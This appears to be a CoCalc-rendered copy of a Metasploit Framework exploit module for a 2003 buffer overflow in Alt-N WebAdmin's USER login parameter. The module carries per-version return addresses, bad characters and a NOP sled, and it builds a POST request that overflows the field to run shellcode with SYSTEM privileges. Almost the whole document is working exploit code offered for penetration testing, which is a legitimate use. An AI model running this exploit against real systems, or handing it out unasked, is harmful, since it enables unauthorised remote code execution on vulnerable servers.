CoCalc -- altn_webadmin.rb

GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/windows/http/altn_webadmin.rb
¹⁹⁶⁶⁴ views
1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Exploit::Remote
7
  Rank = AverageRanking
8

9
  include Msf::Exploit::Remote::HttpClient
10

11
  def initialize(info = {})
12
    super(
13
      update_info(
14
        info,
15
        'Name' => 'Alt-N WebAdmin USER Buffer Overflow',
16
        'Description' => %q{
17
          Alt-N WebAdmin is prone to a buffer overflow condition. This
18
          is due to insufficient bounds checking on the USER
19
          parameter. Successful exploitation could result in code
20
          execution with SYSTEM level privileges.
21
        },
22
        'Author' => [ 'MC' ],
23
        'License' => MSF_LICENSE,
24
        'References' => [
25
          [ 'CVE', '2003-0471' ],
26
          [ 'OSVDB', '2207' ],
27
          [ 'BID', '8024'],
28
          [ 'URL', 'http://www.nessus.org/plugins/index.php?view=single&id=11771']
29
        ],
30
        'Privileged' => true,
31
        'DefaultOptions' => {
32
          'EXITFUNC' => 'thread',
33
        },
34
        'Payload' => {
35
          'Space' => 830,
36
          'BadChars' => "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c",
37
          'StackAdjustment' => -3500,
38

39
        },
40
        'Platform' => 'win',
41
        'Targets' => [
42
          ['Automatic', {}],
43
          ['WebAdmin 2.0.4 Universal', { 'Ret' => 0x10074d9b }], # 2.0.4 webAdmin.dll
44
          ['WebAdmin 2.0.3 Universal', { 'Ret' => 0x10074b13 }], # 2.0.3 webAdmin.dll
45
          ['WebAdmin 2.0.2 Universal', { 'Ret' => 0x10071e3b }], # 2.0.2 webAdmin.dll
46
          ['WebAdmin 2.0.1 Universal', { 'Ret' => 0x100543c2 }], # 2.0.1 webAdmin.dll
47
        ],
48
        'DefaultTarget' => 0,
49
        'DisclosureDate' => '2003-06-24',
50
        'Notes' => {
51
          'Reliability' => UNKNOWN_RELIABILITY,
52
          'Stability' => UNKNOWN_STABILITY,
53
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
54
        }
55
      )
56
    )
57

58
    register_options([Opt::RPORT(1000)])
59
  end
60

61
  def exploit
62
    mytarget = target
63

64
    if (target.name =~ /Automatic/)
65
      res = send_request_raw({
66
        'uri' => '/WebAdmin.DLL'
67
      }, -1)
68

69
      if (res and res.body =~ /WebAdmin.*v(2\..*)$/)
70
        case $1
71
        when /2\.0\.4/
72
          mytarget = targets[1]
73
        when /2\.0\.3/
74
          mytarget = targets[2]
75
        when /2\.0\.2/
76
          mytarget = targets[3]
77
        when /2\.0\.1/
78
          mytarget = targets[4]
79
        else
80
          print_error("No target found for v#{$1}")
81
          return
82
        end
83
      else
84
        print_error("No target found")
85
      end
86
    end
87

88
    user_cook = rand_text_alphanumeric(2)
89
    post_data = 'User=' + make_nops(168) + [mytarget.ret].pack('V') + payload.encoded
90
    post_data << '&Password=wtf&languageselect=en&Theme=Heavy&Logon=Sign+In'
91

92
    print_status("Sending request...")
93
    res = send_request_cgi({
94
      'uri' => '/WebAdmin.DLL',
95
      'query' => 'View=Logon',
96
      'method' => 'POST',
97
      'content-type' => 'application/x-www-form-urlencoded',
98
      'cookie' => "User=#{user_cook}; Lang=en; Theme=standard",
99
      'data' => post_data,
100
      'headers' =>
101
      {
102
        'Accept' => 'image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png',
103
        'Accept-Language' => 'en',
104
        'Accept-Charset' => 'iso-8859-1,*,utf-8'
105
      }
106
    }, 5)
107

108
    handler
109
  end
110
end
111

112
Product

Resources

Company
